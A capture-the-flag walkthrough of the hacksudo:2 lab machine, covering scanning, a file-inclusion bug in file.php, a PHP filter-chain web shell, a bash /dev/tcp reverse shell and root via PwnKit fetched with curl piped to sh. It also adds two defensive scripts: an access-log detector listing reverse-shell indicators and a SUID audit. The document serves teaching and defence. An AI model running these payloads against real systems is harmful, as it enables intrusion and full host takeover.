First, arp-scan is used to scan the network and determine the target's IP address.
ARP-Scan
192.168.2.129 08:00:27:40:d8:e9 PCS Systemtechnik GmbH
Next, the /etc/hosts file is edited to map the hostname hacksudo2.vln to the IP address.
/etc/hosts
192.168.2.129 hacksudo2.vln
Nmap is used to scan the target for open ports and services. The -Pn option skips host discovery in case ICMP is blocked.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 21:14 CEST
Nmap scan report for hacksudo2.vln (192.168.2.129)
Host is up (0.00023s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: hacksudo:2
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 33228/udp6 mountd
| 100005 1,2,3 36509/tcp6 mountd
| 100005 1,2,3 38643/tcp mountd
| 100005 1,2,3 55198/udp mountd
| 100021 1,3,4 36535/tcp6 nlockmgr
| 100021 1,3,4 45622/udp nlockmgr
| 100021 1,3,4 46525/tcp nlockmgr
| 100021 1,3,4 52684/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
1337/tcp open ssh OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 52:2e:98:98:b9:e9:c0:92:ed:ac:f8:8c:ee:3c:2e:dc (RSA)
| 256 6b:bb:8c:90:71:6a:f9:e8:2a:12:8f:0a:78:2b:26:7d (ECDSA)
|_ 256 13:68:45:ff:32:68:0c:e4:b5:1e:9b:ae:b6:33:f3:be (ED25519)
2049/tcp open nfs 3-4 (RPC #100003)
38643/tcp open mountd 1-3 (RPC #100005)
40493/tcp open mountd 1-3 (RPC #100005)
43879/tcp open mountd 1-3 (RPC #100005)
46525/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 08:00:27:40:D8:E9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms hacksudo2.vln (192.168.2.129)
Nikto is used to scan the web server for vulnerabilities.
- Nikto v2.5.0
+ Target IP: 192.168.2.129
+ Target Hostname: 192.168.2.129
+ Target Port: 80
+ Start Time: 2024-09-19 21:15:31 (GMT2)
+ Server: Apache/2.4.46 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 633, size: 5bda170f7dd76, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /web/: Directory indexing found.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /lib/: Directory indexing found.
+ /lib/: This might be interesting.
+ /test.html: This might be interesting.
+ /web/: This might be interesting.
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /README.md: Readme Found.
+ 8104 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2024-09-19 21:15:43 (GMT2) (12 seconds)
+ 1 host(s) tested
Gobuster is used to discover further directories and files.
http://192.168.2.129/index.html (Status: 200) [Size: 1587]
http://192.168.2.129/info.php (Status: 200) [Size: 79829]
http://192.168.2.129/web (Status: 301) [Size: 312] [--> http://192.168.2.129/web/]
http://192.168.2.129/audio (Status: 301) [Size: 314] [--> http://192.168.2.129/audio/]
http://192.168.2.129/css (Status: 301) [Size: 312] [--> http://192.168.2.129/css/]
http://192.168.2.129/test.html (Status: 200) [Size: 3064]
http://192.168.2.129/game.html (Status: 200) [Size: 32472]
http://192.168.2.129/lib (Status: 301) [Size: 312] [--> http://192.168.2.129/lib/]
http://192.168.2.129/file.php (Status: 200) [Size: 238]
http://192.168.2.129/tiles (Status: 301) [Size: 314] [--> http://192.168.2.129/tiles/]
Progress: 13677696 / 13677758 (100.00%)
Analysing file.php revealed a file inclusion vulnerability: its file parameter is used to read arbitrary local files, as the request for /etc/passwd below shows.
view-source:http://192.168.2.129/file.php
hacksudo file access hacksudo FILe access
href="https://hacksudo.com" hacksudo WEBSITE
------------------------------------------------------------------------------------
view-source:http://192.168.2.129/file.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106:/:/usr/sbin/nologin
syslog:x:104:110:://usr/sbin/nologin
_apt:x:105:65534:/:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112:/:/usr/sbin/nologin
tcpdump:x:108:113:/:/usr/sbin/nologin
landscape:x:109:115:/:/usr/sbin/nologin
pollinate:x:110:1:/:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534:/:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo:/home/hacksudo:/bin/bash
lxd:x:998:100:/:/bin/false
_rpc:x:113:65534:/:/usr/sbin/nologin
statd:x:114:65534/var/lib/nfs:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
hacksudo:x:1000:1000:hacksudo:/home/hacksudo:/bin/bash
PHP-Filter-Chain-Generator is used to build a filter chain that turns the file inclusion into code execution; the base64 value below decodes to <?php system($_GET["cmd"]); ?>, and the cmd parameter is then used for the reverse shell.
[+] The following gadget chain will generate the following code : (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.base64-decode/resource=php://temp
The generated payload is used to run the command "id".
------------------------------------------------------------------------------------
http://192.168.2.129/file.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Netcat is used to receive the reverse shell.
listening on [any] 5555 ...
The full reverse shell command is executed.
------------------------------------------------------------------------------------
view-source:http://192.168.2.129/file.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.base64-decode/resource=php://temp&cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27
------------------------------------------------------------------------------------
listening on [any] 5555 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.129] 53558
bash: cannot set terminal process group (777): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$
A reverse shell was obtained successfully.
www-data@hacksudo:/var/www/html$ stty rows 48 columns 94
www-data@hacksudo:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@hacksudo:/var/www/html$
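From the defender's side, every step above (the /etc/passwd read, the php://filter chain, and the URL-encoded reverse shell command) passes through the web server's access log. The following Python script is an added example, not part of the original write-up or of any tool it mentions: it parses Apache access-log lines, URL-decodes the request target (repeatedly, so double-encoded payloads are seen in clear) and tags requests that contain traversal, PHP wrapper, filter-chain or shell-payload indicators. The log lines in SAMPLE_LOG are constructed, modelled on the requests shown above; the INDICATORS table and the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log lines (not from the original write-up). The
# request targets are modelled on the file.php probes shown in the walkthrough.
SAMPLE_LOG = """\
192.168.2.199 - - [19/Sep/2024:21:20:01 +0200] "GET /file.php?file=/etc/passwd HTTP/1.1" 200 2113
192.168.2.199 - - [19/Sep/2024:21:22:10 +0200] "GET /file.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=id HTTP/1.1" 200 64
192.168.2.199 - - [19/Sep/2024:21:25:33 +0200] "GET /file.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.base64-decode/resource=php://temp&cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27 HTTP/1.1" 200 0
192.168.2.50 - - [19/Sep/2024:21:26:00 +0200] "GET /index.html HTTP/1.1" 200 1587
192.168.2.50 - - [19/Sep/2024:21:26:05 +0200] "GET /file.php?file=about.html HTTP/1.1" 200 238
"""

# Common/combined log format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicator patterns (my own selection), matched against the URL-decoded request target.
INDICATORS = {
    "traversal":     [r"\.\./", r"/etc/passwd", r"/etc/shadow", r"/proc/self/"],
    "php_wrapper":   [r"php://", r"data://", r"expect://", r"phar://"],
    "filter_chain":  [r"convert\.iconv\.", r"convert\.base64-"],
    "shell_payload": [r"/dev/tcp/", r"bash -i", r"\bnc\b.*-e", r">&"],
}
COMPILED = {tag: [re.compile(p, re.I) for p in pats] for tag, pats in INDICATORS.items()}


def decode_target(target, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are seen in clear."""
    current = target
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def classify(target):
    """Return (tags, decoded_target) for one request target."""
    decoded = decode_target(target)
    tags = [tag for tag, pats in COMPILED.items() if any(p.search(decoded) for p in pats)]
    return tags, decoded


def analyze_log(text):
    """Parse access-log text and return one finding per request that hits an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole run
        tags, decoded = classify(m["target"])
        if tags:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "target": decoded, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["tags"]), f["target"][:80])
```

Run against the sample, the three attacker requests are reported with their tags while the two ordinary requests are not. A status of 200 on a tagged request is the detail worth alerting on: it means the inclusion succeeded, not just that it was attempted.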
SUID files are enumerated to look for privilege escalation opportunities.
www-data@hacksudo:/var/www/html$ find / -type f -perm -4000 -ls 2>/dev/null
56 43 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /snap/core18/2829/bin/mount
65 63 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/2829/bin/ping
81 44 -rwsr-xr-x 1 root root 44664 Nov 29 2022 /snap/core18/2829/bin/su
99 27 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /snap/core18/2829/bin/umount
1754 75 -rwsr-xr-x 1 root root 76496 Nov 29 2022 /snap/core18/2829/usr/bin/chfn
1756 44 -rwsr-xr-x 1 root root 44528 Nov 29 2022 /snap/core18/2829/usr/bin/chsh
1809 75 -rwsr-xr-x 1 root root 75824 Nov 29 2022 /snap/core18/2829/usr/bin/gpasswd
1873 40 -rwsr-xr-x 1 root root 40344 Nov 29 2022 /snap/core18/2829/usr/bin/newgrp
1886 59 -rwsr-xr-x 1 root root 59640 Nov 29 2022 /snap/core18/2829/usr/bin/passwd
886 44 -rwsr-xr-x 1 root root 44808 Feb 6 2024 /snap/core22/1612/usr/bin/chsh
952 71 -rwsr-xr-x 1 root root 72072 Feb 6 2024 /snap/core22/1612/usr/bin/gpasswd
1036 47 -rwsr-xr-x 1 root root 47488 Apr 9 15:32 /snap/core22/1612/usr/bin/mount
1045 40 -rwsr-xr-x 1 root root 40496 Feb 6 2024 /snap/core22/1612/usr/bin/newgrp
1060 59 -rwsr-xr-x 1 root root 59976 Feb 6 2024 /snap/core22/1612/usr/bin/passwd
1178 55 -rwsr-xr-x 1 root root 55680 Apr 9 15:32 /snap/core22/1612/usr/bin/su
1179 227 -rwsr-xr-x 1 root root 232416 Apr 3 2023 /snap/core22/1612/usr/bin/sudo
1239 35 -rwsr-xr-x 1 root root 35200 Apr 9 15:32 /snap/core22/1612/usr/bin/umount
1331 35 -rwsr-xr-- 1 root systemd-network 35112 Oct 25 2022 /snap/core22/1612/usr/lib/dbus-1.0/dbus-daemon-launch-helper
2600 331 -rwsr-xr-x 1 root root 338536 Jun 26 13:11 /snap/core22/1612/usr/lib/openssh/ssh-keysign
8626 19 -rwsr-xr-x 1 root root 18736 Feb 26 2022 /snap/core22/1612/usr/libexec/polkit-agent-helper-1
293 133 -rwsr-xr-x 1 root root 135960 Apr 24 16:45 /snap/snapd/21759/usr/lib/snapd/snap-confine
---------------------------------------------------------------------------------------------------------------------------------------
7496 24 -rwsr-xr-x 1 root root 22840 Aug 3 2020 /usr/libexec/polkit-agent-helper-1
---------------------------------------------------------------------------------------------------------------------------------------
4308 120 -rwsr-xr-x 1 root root 121688 Sep 16 2020 /usr/sbin/mount.nfs
829 44 -rwsr-xr-x 1 root root 44784 May 28 2020 /usr/bin/newgrp
1088 72 -rwsr-xr-x 1 root root 72072 Aug 30 2020 /usr/bin/su
553 84 -rwsr-xr-x 1 root root 85064 May 28 2020 /usr/bin/chfn
------------------------------------------------------------------------------------------------
883 32 -rwsr-xr-x 1 root root 31032 Aug 3 2020 /usr/bin/pkexec
------------------------------------------------------------------------------------------------
261 180 -rwsr-xr-x 1 root root 182472 Jan 19 2021 /usr/bin/sudo
456 56 -rwsr-sr-x 1 daemon daemon 55712 Jul 10 2020 /usr/bin/at
664 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
862 68 -rwsr-xr-x 1 root root 68208 May 28 2020 /usr/bin/passwd
559 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
815 56 -rwsr-xr-x 1 root root 55680 Aug 30 2020 /usr/bin/mount
1158 40 -rwsr-xr-x 1 root root 39296 Aug 30 2020 /usr/bin/umount
682 88 -rwsr-xr-x 1 root root 88464 May 28 2020 /usr/bin/gpasswd
315 476 -rwsr-xr-x 1 root root
1613 132 -rwsr-xr-x 1 root root 133960 Feb 2 2021 /usr/lib/snapd/snap-confine
1365 52 -rwsr-xr-- 1 root messagebus 51496 Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
The pkexec version is checked.
Reference: https://github.com/ly4k/PwnKit
www-data@hacksudo:/var/www/html$ pkexec --version
pkexec version 0.105
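The SUID listing and the pkexec check above are what a host audit should produce routinely rather than an attacker. The Python script below is an added example, not code from the write-up or from PwnKit: it parses output in the format of the find / -type f -perm -4000 -ls listing above, compares it against an assumed baseline of SUID binaries for a stock Ubuntu 20.04 server, and flags entries that are not in the baseline, that are group- or world-writable, or that are pkexec; lines it cannot parse (such as the truncated entry in the listing above) are kept for manual review instead of being dropped. SAMPLE_FIND_LS is a constructed excerpt, BASELINE is my own list, and /usr/local/bin/backup-helper is a hypothetical entry added to exercise the checks.

```python
import re

# Constructed excerpt in the format of `find / -type f -perm -4000 -ls` (not the
# write-up's full listing). The truncated "315 476" line and the hypothetical
# /usr/local/bin/backup-helper entry are deliberately included as edge cases.
SAMPLE_FIND_LS = """\
  56  43 -rwsr-xr-x 1 root   root    43088 Sep 16  2020 /snap/core18/2829/bin/mount
 829  44 -rwsr-xr-x 1 root   root    44784 May 28  2020 /usr/bin/newgrp
1088  72 -rwsr-xr-x 1 root   root    72072 Aug 30  2020 /usr/bin/su
 883  32 -rwsr-xr-x 1 root   root    31032 Aug  3  2020 /usr/bin/pkexec
 456  56 -rwsr-sr-x 1 daemon daemon  55712 Jul 10  2020 /usr/bin/at
 315 476 -rwsr-xr-x 1 root   root
9999  16 -rwsrwxrwx 1 root   root    16384 Sep 19 21:10 /usr/local/bin/backup-helper
"""

# Assumed baseline of SUID binaries for a stock Ubuntu 20.04 server (my own
# list, not an official one); build yours from a clean reference install.
BASELINE = {
    "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount",
    "/usr/bin/fusermount", "/usr/bin/pkexec", "/usr/bin/at", "/usr/sbin/mount.nfs",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/libexec/polkit-agent-helper-1", "/usr/lib/snapd/snap-confine",
}

# Fields of one `find -ls` line: inode blocks mode links owner group size month day time|year path
FIND_LS_RE = re.compile(
    r"^\s*(?P<inode>\d+)\s+(?P<blocks>\d+)\s+(?P<mode>[-bcdlps][-rwxsStT]{9})\s+"
    r"(?P<links>\d+)\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+(?P<size>\d+)\s+"
    r"(?P<month>[A-Za-z]{3})\s+(?P<day>\d{1,2})\s+(?P<when>[\d:]+)\s+(?P<path>/.*?)\s*$"
)


def parse_find_ls(text):
    """Return (entries, unparsed): parsed dicts and the raw lines that did not match."""
    entries, unparsed = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = FIND_LS_RE.match(line)
        if m:
            entries.append(m.groupdict())
        else:
            unparsed.append(line)  # e.g. a truncated line: keep it for manual review
    return entries, unparsed


def audit(entries, baseline):
    """Flag SUID binaries that deserve attention; /snap/ image contents are listed separately."""
    report = {"unexpected": [], "writable": [], "pkexec": [], "snap": []}
    for e in entries:
        path, mode = e["path"], e["mode"]
        if path.startswith("/snap/"):
            report["snap"].append(path)  # files inside read-only snap images, not host binaries
            continue
        if path not in baseline:
            report["unexpected"].append(path)
        # mode[4:] covers the group and other triplets; a writable SUID binary lets
        # anyone with write access run their own code as the file owner
        if "w" in mode[4:]:
            report["writable"].append(path)
        if path.rsplit("/", 1)[-1] == "pkexec":
            report["pkexec"].append(path)  # verify the CVE-2021-4034 fix at package level
    return report


if __name__ == "__main__":
    entries, unparsed = parse_find_ls(SAMPLE_FIND_LS)
    for key, paths in audit(entries, BASELINE).items():
        print(f"{key:10s} {paths}")
    print("unparsed  ", unparsed)
```

The pkexec entry is flagged rather than judged by its version string on purpose: distributions backported the CVE-2021-4034 fix to polkit 0.105 without changing the number that pkexec --version prints, so the package version has to be compared against the distribution's advisory. Until that is done, the interim mitigation published with the vulnerability is to remove the SUID bit from pkexec.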
The PwnKit exploit (CVE-2021-4034) is used to obtain root privileges.
www-data@hacksudo:/var/www/html$ cd /tmp/
www-data@hacksudo:/tmp$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@hacksudo:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
The root shell was obtained successfully.
root@hacksudo:/tmp# cd /root/
root@hacksudo: ls
root.txt snap
root@hacksudo: cat root.txt
rooted!!!
| |__ __ _ ___| | _____ _ _ __| | ___ ___ ___ _ __ ___
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ / __/ _ \| '_ ` _ \
| | | | (_| | (__| <\__ \ |_| | (_| | (_) | _ | (_| (_) | | | | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ (_) \___\___/|_| |_| |_|
www.hacksudo.com
The user flag is displayed.
root@hacksudo: cat /home/hacksudo/.
./ .bash_logout .profile
../ .bashrc .sudo_as_admin_successful
.bash_history .cache/
root@hacksudo: find / -name user.txt 2>/dev/null
root@hacksudo:
Privilege escalation successful